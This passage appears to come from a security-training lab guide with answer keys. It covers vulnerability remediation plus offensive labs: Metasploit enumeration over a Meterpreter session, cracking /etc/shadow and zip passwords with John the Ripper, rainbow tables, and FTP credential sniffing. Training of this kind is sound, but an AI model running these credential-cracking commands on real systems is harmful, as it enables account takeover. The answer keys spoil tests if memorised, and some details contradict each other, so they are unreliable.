   c. Expand Forest: CorpNet.local.
   d. Expand Domains.
   e. Expand CorpNet.local.
   f. Right-click Default Domain Policy and select Edit.
   g. Maximize the window for easier viewing.
   h. Under Computer Configuration, expand Policies.
   i. Expand Windows Settings.
   j. Expand Security Settings.
   k. Expand Account Policies.
   l. Select Account Lockout Policy.
   m. In the right pane, right-click the policy and select Properties.
   n. Select Define this policy setting.
   o. Enter 60 minutes and then click OK.
   p. In the left pane, select Password Policy.
   q. In the right pane, right-click the policy and select Properties.
   r. Select Define this policy setting.
   s. Enter the password setting and then click OK.
   t. Repeat steps 4q–4s for each additional Password policy.
5. Remediate Event Log issues as follows:
   a. In the left pane, select Event Log.
   b. In the right pane, right-click the policy and select Properties.
   c. Select Define this policy setting.
   d. Enter the password setting and then select OK.
   e. Repeat steps 5b–5d for each additional Event Log policy.
6. Remediate System Services issues as follows:
   a. In the left pane, select System Services.
   b. In the right pane, right-click the policy and select Properties.
   c. Select Define this policy setting.
   d. Make sure Disabled is selected and then click OK.
   e. Repeat steps 6b–6d for each additional System Services policy.
7. Verify that all the issues were resolved using the Security Evaluator feature on the ITAdmin computer as follows:
   a. From the top navigation tabs, select Floor 1.
   b. Select ITAdmin.
   c. In Security Evaluator, select Status Run/Rerun Security Evaluation icon to rerun the security evaluation.
   d. If you still see unresolved issues, select Floor 1, navigate to CorpDC, and remediate any remaining issues.
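The re-scan in step 7 can also be done against the policy file itself. The Python below is an added example, not part of the original lab: it checks a security-template INF (the text format written by secedit /export) against the target values in this lab's policy table. The sample export is constructed with three settings left unremediated; the section and key names, the numeric encodings (retention 2 = do not overwrite, start type 4 = disabled) and the "at least" comparison for numeric limits are assumptions to confirm against a real export.

```python
import csv

# Constructed security-template export with three settings still wrong:
# password length, system log retention and the Task Scheduler start type.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MinimumPasswordLength = 7
PasswordHistorySize = 24
ResetLockoutCount = 60
[Application Log]
AuditLogRetentionPeriod = 2
[Security Log]
AuditLogRetentionPeriod = 2
[System Log]
AuditLogRetentionPeriod = 0
[Service General Setting]
"DcomLaunch",4,""
"Schedule",2,""
[Version]
signature="$CHICAGO$"
Revision=1
"""

# (section, key, comparison, target, label taken from the lab's table)
# "min" = value must be at least the target, "eq" = value must match exactly.
BASELINE = [
    ("System Access", "ResetLockoutCount", "min", 60,
     "Reset account lockout counter after"),
    ("System Access", "MinimumPasswordLength", "min", 14, "Minimum password length"),
    ("System Access", "MinimumPasswordAge", "min", 1, "Minimum password age"),
    ("System Access", "PasswordHistorySize", "min", 24, "Enforce password history"),
    ("Application Log", "AuditLogRetentionPeriod", "eq", 2,
     "Retention method for application log"),
    ("Security Log", "AuditLogRetentionPeriod", "eq", 2,
     "Retention method for security log"),
    ("System Log", "AuditLogRetentionPeriod", "eq", 2,
     "Retention method for system log"),
    ("Service General Setting", "DcomLaunch", "eq", 4, "DCOM Server Process Launcher"),
    ("Service General Setting", "Schedule", "eq", 4, "Task Scheduler"),
]


def parse_inf(text):
    """Return {section: {key: value}} for a security-template INF."""
    sections, name = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1]
            sections.setdefault(name, {})
        elif name == "Service General Setting":
            # Service rows have no "=": "ServiceName",StartType,"SDDL"
            fields = next(csv.reader([line]))
            if len(fields) >= 2:
                sections[name][fields[0]] = fields[1].strip()
        elif name is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[name][key.strip()] = value.strip()
    return sections


def audit(sections):
    """Return [(label, target, found)] for every setting that misses the table."""
    failures = []
    for section, key, op, target, label in BASELINE:
        raw = sections.get(section, {}).get(key)
        try:
            value = int(raw)
        except (TypeError, ValueError):
            value = None      # missing or non-numeric counts as a failure
        if value is None:
            ok = False
        elif op == "min":
            ok = value >= target
        else:
            ok = value == target
        if not ok:
            failures.append((label, target, value))
    return failures


if __name__ == "__main__":
    for label, target, found in audit(parse_inf(SAMPLE_INF)):
        print(f"FAIL  {label}: expected {target}, found {found}")
```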
QUESTION 13:
You are the IT security administrator for a small corporate network.
You need to use a vulnerability scanner to check for security issues on
your Linux computers.
In this lab, your task is to:
• Use the Security Evaluator to check the security:
  o On the Linux computer with the 192.168.0.45 IP address.
  o On the Linux computers in the IP address range of 192.168.0.60 through 192.168.0.69
• Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status: Pass
Elapsed Time: 12 minutes 57 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Run a Security Evaluator report for 192.168.0.45
Q1 For the Linux computer with the 192.168.0.45 address, which security vulnerability passed?
Run a Security Evaluator report for IP address range of 192.168.0.60-192.168.0.69
Q2 Which IP addresses in the 192.168.0.60 through 192.168.0.69 range had issues that need to be resolved?
Q3 For the Linux computer with the 192.168.0.65 address, what is the name of the vulnerability that only has a warning?
Explanation
In this lab, your task is to:
• Use the Security Evaluator to check the security:
  o On the Linux computer with the 192.168.0.45 IP address.
  o On the Linux computers in the IP address range of 192.168.0.60 through 192.168.0.69
• Answer the questions.
Complete this lab as follows:
1. Run a Security Evaluator report for 192.168.0.45 as follows:
   a. From the taskbar, open Security Evaluator.
   b. Next to Local Machine, select the Target icon to select a new target.
   c. Select IPv4 Address.
   d. Enter 192.168.0.45.
   e. Click OK.
   f. Select Status Run/Rerun Security Evaluation icon to run the security evaluation.
   g. Review the results.
   h. In the top right, select Answer Questions.
   i. Answer question 1.
2. Run a Security Evaluator report for the IP address range of 192.168.0.60 through 192.168.0.69 as follows:
   a. In Security Evaluator, select the Target icon to select a new target.
   b. Select IPv4 Range.
   c. In the left field, type: 192.168.0.60
   d. In the right field, type: 192.168.0.69
   e. Click OK.
   f. Select Status Run/Rerun Security Evaluation icon to run the security evaluation.
   g. Review the results.
   h. Answer questions 2 and 3.
   i. Select Score Lab.
Lab Questions:
1. For the Linux computer with the 192.168.0.45 address, which security vulnerability?
   a. Root – Password Does Not Expire
2. Which IP addresses in the 192.168.0.60 through 192.168.0.69 range has issues that need to be resolved? (Select all that apply.)
   a. 192.168.0.65
   b. 192.168.0.68
3. For the Linux computer with the 192.168.0.45 address, what is the name of the vulnerability that only had a warning?
   a. Backup – Password Does Not Expire
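The "Password Does Not Expire" findings in this lab correspond to the maximum-age field of each account's /etc/shadow entry. The following is an added example, not part of the lab or of Security Evaluator: a small auditor that reads shadow-format text and reports accounts whose password never expires or exceeds a policy limit. The 90-day limit, the issue names and the sample entries are assumptions made for the illustration.

```python
from dataclasses import dataclass

# 99999 is the conventional "never expires" maximum age (a common login.defs default).
NEVER_EXPIRES = 99999


@dataclass(frozen=True)
class Finding:
    user: str
    issue: str    # "no_expiry", "exceeds_policy", "empty_password" or "malformed"
    detail: str


def audit_password_aging(shadow_text, policy_max_days=90):
    """Return a Finding for each shadow(5) entry that breaks the aging policy."""
    findings = []
    for lineno, raw in enumerate(shadow_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # name:hash:last_change:min_age:max_age:warn:inactive:expire:reserved
        fields = line.split(":")
        if len(fields) < 5:
            findings.append(Finding(f"line {lineno}", "malformed", raw))
            continue
        user, pw_hash, max_age = fields[0], fields[1], fields[4]

        if pw_hash == "":
            findings.append(Finding(user, "empty_password", "no password required"))
            continue
        if pw_hash.startswith(("!", "*")):
            # Locked account or password login disabled: aging is not the risk here.
            continue

        if max_age == "":
            findings.append(Finding(user, "no_expiry", "maximum age not set"))
        elif not max_age.isdigit():
            findings.append(Finding(user, "malformed", f"max_age={max_age!r}"))
        elif int(max_age) >= NEVER_EXPIRES:
            findings.append(Finding(user, "no_expiry", f"max_age={max_age}"))
        elif int(max_age) > policy_max_days:
            findings.append(Finding(user, "exceeds_policy", f"max_age={max_age}"))
    return findings


# Constructed sample in /etc/shadow layout; the hashes are placeholders, not real.
SAMPLE_SHADOW = """\
root:$6$placeholder$notarealhash:19600:0:99999:7:::
backup:$6$placeholder$notarealhash:19600:0::7:::
mary:$6$placeholder$notarealhash:19600:0:60:7:::
svcreport:$6$placeholder$notarealhash:19600:0:365:7:::
daemon:*:19000:0:99999:7:::
olduser:!$6$placeholder$notarealhash:19000:0:99999:7:::
truncated:entry
"""

if __name__ == "__main__":
    for f in audit_password_aging(SAMPLE_SHADOW):
        print(f"{f.user:<10} {f.issue:<15} {f.detail}")
```

On a live host, `chage -l <user>` shows the same aging fields and `chage -M <days> <user>` sets the maximum age.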
QUESTION 14:
You are the IT security administrator for a small corporate network.
You perform regular vulnerability scans on your network. Recently,
you added a new network security appliance (NSA) to the network.
You used the ITAdmin workstation when you configured the NSA.
In this lab, your task is to:
• Run a vulnerability scan for the network security appliance (NSA) (198.28.56.18) using Security Evaluator on the taskbar.
• Remediate the vulnerabilities found in the vulnerability report on the NSA.
  o Rename the cisco user account using the following parameters:
    ▪ Set a username of your choice.
    ▪ Set a password of your choice.
    ▪ Set the idle timeout to 15 minutes or less.
    ▪ Set LAN access only for your user (no WAN access).
    ▪ Allow access to your user only from the ITAdmin workstation (192.168.0.31).
• Re-run a vulnerability scan to make sure all of the issues are resolved.
“Access the NSA management console through Google Chrome on http://198.28.56.18 using the username cisco and the password cisco.”
Your Performance
Your Score: 5 of 5 (100%)
Pass Status: Pass
Elapsed Time: 10 minutes 43 seconds
Required Score: 100%
Task Summary
Required Actions
Change the default Admin username
Change the default Admin password
Change the idle timeout for the Admin user to 15 minutes or less
Limit administrative access for the Admin user to WAN only
Limit administrative access for the Admin user to only the ITAdmin computer
Explanation
In this lab, your task is to:
• Run a vulnerability scan for the network security appliance (NSA) (198.28.56.18) using Security Evaluator on the taskbar.
• Remediate the vulnerabilities found in the vulnerability report on the NSA.
  o Rename the cisco user account using the following parameters:
    ▪ Set a username of your choice.
    ▪ Set a password of your choice.
    ▪ Set the idle timeout to 15 minutes or less.
    ▪ Set LAN access only for your user (no WAN access).
    ▪ Allow access to your user only from the ITAdmin workstation (192.168.0.31).
• Re-run a vulnerability scan to make sure all of the issues are resolved.
Complete this lab as follows:
1. Run a Security Evaluator report as follows:
   a. From the taskbar, open Security Evaluator.
   b. Next to Local Machine, select the Target icon to select a new target.
   c. Select IPv4 Address.
   d. Enter 198.28.56.18.
   e. Click OK.
   f. Select the Status Run/Rerun Security Evaluation icon to run the security evaluation.
   g. Review the results to determine which issues you need to resolve on the NSA.
2. From the taskbar, open Chrome.
3. Maximize Chrome for easier viewing.
4. In the URL field, type 198.28.56.18 and press Enter.
5. In the Security Appliance Configuration utility, enter cisco as the username.
6. Enter cisco as the password.
7. Select Log In.
8. Rename the cisco user account as follows:
   a. From the Getting Started (Basic) page, select Change Default Admin Password and Add Users.
   b. Select Edit for the cisco username.
   c. In the User Name field, enter the username you chose.
   d. Select Check to Edit Password.
   e. In the Enter Current Logged in Administrator Password field, enter cisco.
   f. In the New Password field, enter the password you choose.
   g. In the Confirm New Password field, enter the password to confirm the new password.
   h. Enter the idle timeout.
   i. Click Apply.
9. Edit user policies as follows:
   a. Under Edit User Policies, select Login to configure a login policy.
   b. Select Deny Login from WAN Interface.
   c. Click Apply.
10. Define network access as follows:
   a. Under Edit User Policies, select By IP to configure IP address restrictions for login.
   b. Under Defined Addresses, select Add.
   c. In the Source Address Type field, make sure IP Address is selected.
   d. In the Network Address/IP Address field, enter 192.168.0.31 for ITAdmin.
   e. Click Apply.
   f. Select Allow Login only from Defined Addresses.
   g. Click Apply to close the dialog.
11. Verify that all the issues were resolved using the Security Evaluator feature on the ITAdmin computer as follows:
   a. From the taskbar, open Security Evaluator.
   b. In Security Evaluator, select Status Run/Rerun Security Evaluation icon to rerun the security evaluation.
   c. Remediate any remaining issues.
QUESTION 15:
You are the IT security administrator for a small corporate network.
You are performing vulnerability scans on your network. Mary is the
primary administrator for the network and the only person authorized
to perform local administrative actions. The company network security
policy requires complex passwords for all users. It is also required that
Windows Firewall is enabled on all workstations. Sharing personal
files is not allowed.
In this lab, your task is to:
• Run a vulnerability scan for the Office2 workstation using the Security Evaluator on the taskbar.
• Remediate the vulnerabilities found in the vulnerability report on Office2 as follows:
  o Rename the Administrator account.
  o Disable the Guest account.
  o Set the password for the Mary account to expire.
  o Require a strong password for the Mary account.
  o Unlock the Susan account.
  o Remove the Susan account from the Administrators group.
  o Turn on Windows Firewall for all profiles.
  o Remove the file share on the MyMusic folder.
• Re-run a vulnerability scan to make sure all of the issues are resolved.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status: Pass
Elapsed Time: 6 minutes 49 seconds
Required Score: 100%
Task Summary
Required Actions
Remediate the Administrator account
Disable the Guest account
Remediate the Mary account
Set a strong password (12 characters or more) for the Mary account
Remove Password Never Expires from the Mary account
Remediate the Susan account
Unlock the Susan account
Remove Susan from the Administrators group
Turn on the Windows Firewall feature for all profiles
Remove the C:\MyMusic folder share
Explanation
In this lab, your task is to:
• Run a vulnerability scan for the Office2 workstation using the Security Evaluator on the taskbar.
• Remediate the vulnerabilities found in the vulnerability report on Office2 as follows:
  o Rename the Administrator account.
  o Disable the Guest account.
  o Set the password for the Mary account to expire.
  o Require a strong password for the Mary account.
  o Unlock the Susan account.
  o Remove the Susan account from the Administrators group.
  o Turn on Windows Firewall for all profiles.
  o Remove the file share on the MyMusic folder.
• Re-run a vulnerability scan to make sure all of the issues are resolved.
Complete this lab as follows:
1. Run a Security Evaluator report as follows:
   a. From the taskbar, open Security Evaluator.
   b. Next to Local Machine, select the Target icon to select a new target.
   c. Select Workstation.
   d. From the Workstation drop-down list, select Office2 as the target.
   e. Click OK.
   f. Select Status Run/Rerun Security Evaluation icon to run the security evaluation.
   g. Review the results to determine which issues you need to resolve on Office2.
2. From the top navigation tabs, select Floor 1.
3. Under Office 2, select Office2.
4. On Office2, right-click Start and select Computer Management.
5. Expand Local Users and Groups.
6. Select Users.
7. Rename a user account as follows:
   a. Right-click Administrator and select Rename.
   b. Enter a new name and press Enter.
8. Disable the Guest account as follows:
   a. Right-click Guest and select Properties.
   b. Select Account is disabled and then click OK.
9. Set a new password as follows:
   a. Right-click Mary and select Set Password.
   b. Select Proceed.
   c. Enter a new password (12 characters or more).
   d. Confirm the new password and then click OK.
   e. Click OK.
   Ideally, you should have created a policy that requires passwords with 12 characters or more.
10. Set a password to expire as follows:
   a. Right-click Mary and select Properties.
   b. Deselect Password never expires.
   c. Select User must change password at next logon and then click OK.
11. Unlock a user account and remove the user from a group as follows:
   a. Right-click Susan and select Properties.
   b. Deselect Account is locked out and then click Apply.
   c. Select the Member of tab.
   d. Select the Administrators.
   e. Select Remove.
   f. Click OK.
   g. Close Computer Management.
12. Enable Windows Firewall for all profiles as follows:
   a. In the search field on the taskbar, enter Control Panel.
   b. Under Best match, select Control Panel.
   c. Select System and Security.
   d. Select Windows Firewall.
   e. Select Turn Windows Firewall on or off.
   f. Under Domain network settings, select Turn on Windows Firewall.
   g. Under Private network settings, select Turn on Windows Firewall.
   h. Under Public network settings, select Turn on Windows Firewall.
   i. Click OK.
   j. Close Windows Firewall.
13. Remove a file share as follows:
   a. From the taskbar, open File Explorer.
   b. Browse to C:\MyMusic.
   c. Right-click MyMusic and select Properties.
   d. Select the Sharing tab.
   e. Select Advanced Sharing.
   f. Deselect Share this folder.
   g. Click OK.
   h. Click OK.
14. Use the Security Evaluator feature to verify that all of the issues on the ITAdmin computer were resolved as follows:
   a. From the top navigation tabs, select Floor 1.
   b. Select ITAdmin.
   c. In Security Evaluator, select Status refresh to rerun the security evaluation.
   d. If you still see unresolved issues, select Floor 1, navigate to the Office2 workstation, and remediate any remaining issues.
QUESTION 16:
You are the IT security administrator for a small corporate network.
You perform vulnerability scans on your network. You need to verify
the security of your wireless network and your Ruckus wireless access
controller.
In this lab, your task is to:
• Run a vulnerability scan for the wireless access controller (192.168.0.6) using Security Evaluator on the taskbar.
• Remediate the vulnerabilities found in the vulnerability report for the wireless access controller.
  o New Admin name: your choice
  o New password: your choice
  o Enable reporting of rogue devices for intrusion prevention.
• Rerun a vulnerability scan to make sure all of the issues are resolved.
“Access the wireless controller console through Google Chrome on http://192.168.0.6 with the admin name admin and the password password.”
Your Performance
Your Score: 2 of 2 (100%)
Pass Status: Pass
Elapsed Time: 4 minutes 53 seconds
Required Score: 100%
Task Summary
Required Actions
Change the default Admin username and password
Enable Intrusion Detection
Explanation
In this lab, your task is to:
• Run a vulnerability scan for the wireless access controller (192.168.0.6) using Security Evaluator on the taskbar.
• Remediate the vulnerabilities found in the vulnerability report for the wireless access controller.
  o New Admin name: your choice
  o New password: your choice
  o Enable reporting of rogue devices for intrusion prevention.
• Re-run a vulnerability scan to make sure all of the issues are resolved.
Complete this lab as follows:
1. Run a Security Evaluator report as follows:
   a. From the taskbar, open Security Evaluator.
   b. Next to Local Machine, select the Target icon to select a new target.
   c. Select IPv4 Address.
   d. Enter 192.168.0.6 for the wireless access controller.
   e. Click OK.
   f. Select the Status Run/Rerun Security Evaluation icon to run the security evaluation.
   g. Review the results to determine which issues you need to resolve on the wireless access controller.
2. Change the admin username and password as follows:
   a. From the taskbar, open Chrome.
   b. Maximize Chrome for easier viewing.
   c. Type 192.168.0.6 and press Enter.
   d. Enter the admin name.
   e. Enter the password.
   f. Select Login.
   g. From the top, select the Administer tab.
   h. Make sure Authenticate using the admin name and password is selected.
   i. In the Admin Name field, enter the username you chose.
   j. In the Current Password field, enter the password.
   k. In the New Password field, enter the password you chose.
   l. In the Confirm New Password field, enter the new password.
   m. On the right, select Apply.
3. Enable intrusion prevention as follows:
   a. Select the Configure tab.
   b. On the left, select WIPS.
   c. Under Intrusion Detection and Prevention, select Enable report rogue devices.
   d. On the right, select Apply.
4. Verify that all the issues were resolved using the Security Evaluator feature on the ITAdmin computer as follows:
   a. From the taskbar, open Security Evaluator.
   b. In Security Evaluator, select Status Run/Rerun Security Evaluation icon to rerun the security evaluation.
   c. Remediate any remaining issues.
QUESTION 17:
You are an ethical hacker consultant working for CorpNet. CorpNet
wants you to discover weaknesses in their public-facing servers. From
outside of the CorpNet network, you are able to deploy a Metasploit
payload to one of their Windows servers named www3.corpnet.xyz.
You are determining whether the Windows patches are up to date or if
there is an unpatched vulnerability that could be exploited.
In this lab, your task is to:
• Use the post/windows/gather/enum_patches exploit in Metasploit to enumerate the Windows patches that are missing or vulnerable.
• Answer the question.
“Metasploit has already been configured to exploit the payload that was deployed to www3.corpnet.xyz. This Meterpreter payload has already connected as session 1.”
Your Performance
Your Score: 2 of 2 (100%)
Pass Status: Pass
Elapsed Time: 4 minutes 14 seconds
Required Score: 100%
Task Summary
Lab Questions
Configure and run the enum_patches exploit
Q1 Which Windows patches are missing?
Explanation
In this lab, your task is to
• Use the post/windows/gather/enum_patches exploit in Metasploit to enumerate the Windows patches that are missing or vulnerable.
• Answer the question.
Complete this lab as follows:
1. From the Favorites bar, open Metasploit Framework.
2. At the prompt, type use post/windows/gather/enum_patches and press Enter to use the enumerate patches exploit.
3. Type show options and press Enter to show the exploit options.
   Notice that the session option is absent.
4. Type set session 1 and press Enter to specify the session.
5. Type show options and press Enter.
   Notice that the session option has been set.
6. Type run and press Enter to begin the exploit.
7. In the top right, select Answer Questions.
8. Answer the question.
9. Select Score Lab.
Lab Questions:
1. Which Windows patches are missing?
   a. KB2871997
   b. KB2928120
QUESTION 18:
You are an ethical hacker consultant working for CorpNet. CorpNet
wants you to discover weaknesses in their public-facing servers. From
outside of the CorpNet network, you have discovered one of their
Windows servers named www3.corpnet.xyz with an IP address of
198.28.1.3. You believe a Microsoft SQL server is installed on this
server, but it doesn't respond to the default TCP port of 1433.
In this lab, your task is to use the auxiliary/scanner/mssql/mssql_ping
exploit in Metasploit to determine which TCP port Microsoft SQL is
using.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status: Pass
Elapsed Time: 1 minute 57 seconds
Required Score: 100%
Task Summary
Lab Questions
Configure and run the auxiliary/scanner/mssql/mssql_ping exploit
Q1 Which port is the Microsoft SQL Server using on www3.corpnet.xyz?
Explanation
In this lab, your task is to use the auxiliary/scanner/mssql/mssql_ping exploit in Metasploit to
determine which TCP port Microsoft SQL is using.
Complete this lab as follows:
1. From the Favorites bar, open Metasploit Framework.
2. At the prompt, type use auxiliary/scanner/mssql/mssql_ping and press Enter to use the MSSQL Ping Utility exploit.
3. Type show options and press Enter to show the exploit options.
   Notice that the RHOSTS setting is absent.
4. Type set RHOSTS 198.28.1.3 and press Enter to specify the remote host.
5. Type show options and press Enter to show the exploit options.
   Notice that RHOSTS has been set.
6. Type exploit and press Enter to begin the exploit.
7. In the top right, select Answer Questions.
8. Answer the question.
9. Select Score Lab.
Lab Questions:
1. Which port is the Microsoft SQL Server using on www3.corpnet.xyz?
   a. 1511
A.2.2 Pro Domain 2: Gain Access
QUESTION 1:
You are the IT security administrator for a small corporate network.
You've received a zip file that contains sensitive password-protected
files. You need to access these files. The zip file is located in the
home directory.
In this lab, your task is to use John the Ripper to:
• Crack the root password on Support.
• Crack the password of the protected.zip file in the home directory on IT-Laptop.
“After John the Ripper cracks the password, it won’t crack it again. The results are stored in the john.pot file.”
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 7 minutes 7 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Crack the password to the Linux computer
Q1 What is the password for the Linux computer?
Crack the password to the zip file
Q2 What is the password for the protected.zip file?
Explanation
In this lab, your task is to use John the Ripper to:
• Crack the root password on Support.
• Crack the password of the protected.zip file in the home directory on IT-Laptop.
Complete this lab as follows:
1. Crack the root password on Support as follows:
   a. From the Favorites bar, open Terminal.
   b. At the prompt, type cd /usr/share/john and press Enter to change directories to the folder containing the John the Ripper password file.
   c. Type ls and press Enter to list the files in the directory.
   d. Type cat password.lst and press Enter to view the password list. This is an abbreviated list.
   e. Type cd and press Enter to go back to root.
   f. Type john /etc/shadow and press Enter to crack the Linux passwords.
      Notice that the root password of 1worm4b8 was cracked.
   g. Type john /etc/shadow and press Enter to attempt to crack the Linux passwords again.
      Notice that it does not attempt to crack the password again. The cracked password is already stored in the john.pot file.
   h. Type cat ./.john/john.pot and press Enter to view the contents of the john.pot file.
   i. Type john /etc/shadow --show and press Enter as an alternate method of viewing the previously cracked password.
   j. In the top right, select Answer Questions.
   k. In Terminal, find the root password and answer the question.
2. Crack the password of the protected.zip file as follows:
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under IT Administration, select IT-Laptop.
   c. From the Favorites bar, open Terminal.
   d. At the prompt, type ls and press Enter to view the contents of the home directory. Notice the protected.zip file you wish to crack.
   e. Type zip2john protected.zip > ziphash.txt and press Enter to copy the hashes to a text file.
   f. Type cat ziphash.txt and press Enter to confirm that the hashes have been copied.
   g. Type john --format=pkzip ziphash.txt and press Enter to crack the password.
      Notice that the password of p@ssw0rd was cracked.
   h. Type john ziphash.txt --show and press Enter to show the password.
   i. In the top right, select Answer Questions.
   j. In Terminal, find the password for the file and answer the question.
   k. Select Score Lab.
Lab Questions:
1. 1worm4b8
2. p@ssw0rd
QUESTION 2:
While doing some penetration testing for your company, you captured
some password hashes. The password hashes are saved in the root
user's home directory /root/captured_hashes.txt. Now you want to
hack these passwords using a rainbow table. The password
requirements for your company are as follows:
• The password must be 20 or more characters in length.
• The password must include at least one upper and one lowercase letter.
• The password must have at least one of these special characters: ! " # $ % & _ ' * @
• All passwords are encrypted using a hash algorithm of either md5 or sha1.
In this lab, your task is to:
• Create md5 and sha1 rainbow tables using rtgen.
• Sort the rainbow tables using rtsort.
• Crack the hashes using rcrack. You must run rcrack on one individual hash and run it on the hash file.
• Answer the question.
“The type of charset that can be used to create a rainbow table is stored in the /usr/share/rainbowcrack/charset.txt file. This file can be viewed using the cat command.”
Your Performance
Your Score: 7 of 7 (100%)
Pass Status: Pass
Elapsed Time: 6 minutes 37 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Create rainbow tables
rtgen md5 ascii-32xx
rtgen sha1 ascii-32xx
Sort the rainbow tables using rtsort
Crack the hash using rcrack . -l
Crack the hash using rcrack . -h
Q1 What is the password for hash 202cb962ac59075b964b07152d234b70?
Q2 What is the password for hash 400238780e6c41f8f790161e6ed4df3b?
Q3 What is the password for hash 89BF04763BF91C9EE2DDBE23D7B5C730BDD41FF2?
Explanation
In this lab, your task is to:
• Create md5 and sha1 rainbow tables using rtgen.
• Sort the rainbow tables using rtsort.
• Crack the hashes using rcrack. You must run rcrack on one individual hash as well as running it on the hash file.
• Answer the questions.
Complete this lab as follows:
1. From the Favorites bar, open Terminal.
2. At the prompt, type rtgen md5 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create a md5 rainbow crack table.
3. Type rtgen sha1 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create a sha1 rainbow crack table.
4. Type rtsort . and press Enter to sort the rainbow table.
5. Type rcrack . -l /root/captured_hashes.txt and press Enter to crack the password contained in a hash file.
6. Type rcrack . -h hash_value and press Enter to crack the password contained in a hash.
7. In the top right, select Answer Questions.
8. Answer the questions.
9. Select Score Lab.
Lab Questions:
1. 123
2. MaryHad_A_Sm@ll_Lamb
3. DisneyL@nd3
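Precomputed tables work in this lab because the company stores plain md5 or sha1 digests, so the same password always yields the same hash. The following is an added example, not part of the lab: it contrasts that storage with a per-user salted PBKDF2 record. A plain digest-to-plaintext dictionary stands in for the rainbow table (the same precomputation idea without chain compression); the iteration count, function names and record layout are assumptions made for the illustration.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumed work factor for this example


def unsalted_md5(password):
    """The weak scheme from the lab: one fixed digest per password."""
    return hashlib.md5(password.encode()).hexdigest()


def build_precomputed_table(candidates):
    """Stand-in for a precomputed table: unsalted digest -> plaintext."""
    return {unsalted_md5(c): c for c in candidates}


def exposed_by_table(stored_hash, table):
    """Return the plaintext if the stored hash appears in the table, else None."""
    return table.get(stored_hash.lower())


def new_salted_record(password, salt=None):
    """Hardened scheme: random per-user salt plus a slow key-derivation function."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return {"salt": salt.hex(), "iterations": PBKDF2_ITERATIONS, "hash": digest.hex()}


def verify_salted(password, record):
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(digest.hex(), record["hash"])


def compare_storage(password, candidates):
    """Show what a table built once can recover from each storage scheme."""
    table = build_precomputed_table(candidates)
    weak = unsalted_md5(password)
    user_a = new_salted_record(password)
    user_b = new_salted_record(password)
    return {
        "unsalted_hash": weak,
        "unsalted_recovered": exposed_by_table(weak, table),
        "salted_recovered": exposed_by_table(user_a["hash"], table),
        "same_password_same_hash": user_a["hash"] == user_b["hash"],
    }


if __name__ == "__main__":
    # Constructed candidate list; "123" is the answer the lab gives for Q1.
    print(compare_storage("123", ["123", "letmein", "password"]))
```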
QUESTION 3:
You are the cybersecurity specialist for your company. You are
conducting a penetration test to see if anyone is using FTP against
company policy.
In this lab, your task is to capture FTP packets as follows:
• Use Wireshark to capture packets for five seconds.
• Filter for FTP packets.
• Answer the questions.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status: Pass
Elapsed Time: 6 minutes 9 seconds
Required Score: 100%
Task Summary
Lab Questions
Q1 What is the name used to log into the FTP session?
Q2 What is the password used to log into the FTP site?
Q3 What is the name of the file downloaded during the FTP session?
Explanation
In this lab, your task is to capture FTP packets as follows:
• Use Wireshark to capture packets for five seconds.
• Filter for FTP packets.
• Answer the questions.
Complete this lab as follows:
1. From the Favorites bar, open Wireshark.
2. Under Capture, select enp2s0.
3. Select the blue fin to begin a Wireshark capture.
4. Capture packets for five seconds.
5. Select the red box to stop the Wireshark capture.
6. In the Apply a display filter field, type ftp and press Enter.
7. In the top right, select Answer Questions.
8. Answer the questions.
9. Select Score Lab.
Lab Questions:
3. What is the name used to log into the FTP session?
   a. Admin
4. What is the password used to log into the FTP site?
   a. P@ssword
5. What is the name of the file downloaded during the FTP session?
   a. Usage.txt
QUESTION 4:
You work as the IT security administrator for a small corporate
network. The company president has received several emails that he
is wary of. He has asked you to determine whether they are
hazardous and handle them accordingly.
In this lab, your task is to:
• Read each email and determine whether it is legitimate.
• Delete any emails that are attempts at social engineering.
• Keep any emails that are safe.
“Hold your mouse over the embedded links to see the actual URL in the status bar at the bottom of the screen.”
Your Performance
Your Score: 8 of 8 (100%)
Pass Status: Pass
Elapsed Time: 1 minute 40 seconds
Required Score: 100%
Task Summary
Required Actions
Delete the Microsoft Windows Update Center phishing email
Delete the Online Banking phishing email
Delete the Grandma Jacklin forwarded email hoax
Delete the Emily Smith spear phishing email
Delete the Sara Goodwin malicious attachment email
Delete the Grandma Jacklin forwarded email hoax
Delete the Joe Davis malicious attachment email
Delete the Executive Recruiting whaling email
Explanation
In this lab, delete each malicious email.
Email (sender / subject) | Diagnosis | Action | Description
--- | --- | --- | ---
Microsoft Windows Update Center / New Service Pack | Phishing | Delete | Notice the various spelling errors and that the link does not direct you to a Microsoft website.
Joe Davis / Re: Lunch Today? | Malicious Attachment | Delete | This email appears to be from a colleague. However, why would he fail to respond to your lunch question and send you a random attachment in return?
Executive Recruiting / Executive Jobs | Whaling | Delete | Whaling uses tailored information to attack executives. Clicking the link could install malware that would capture sensitive company information.
Human Resources / Ethics Video | Safe | Keep | While this email has an embedded link, it is digitally signed, so you know it actually comes from your Human Resources department. In addition, if you hover over the link, you see that it is a secure link to the corporate web server.
Online Banking Department / Payment Pending | Phishing | Delete | This is a carefully crafted attempt to get your bank account information. Hover over the link and notice that it does not direct you to your credit union website, but to an unknown IP address instead.
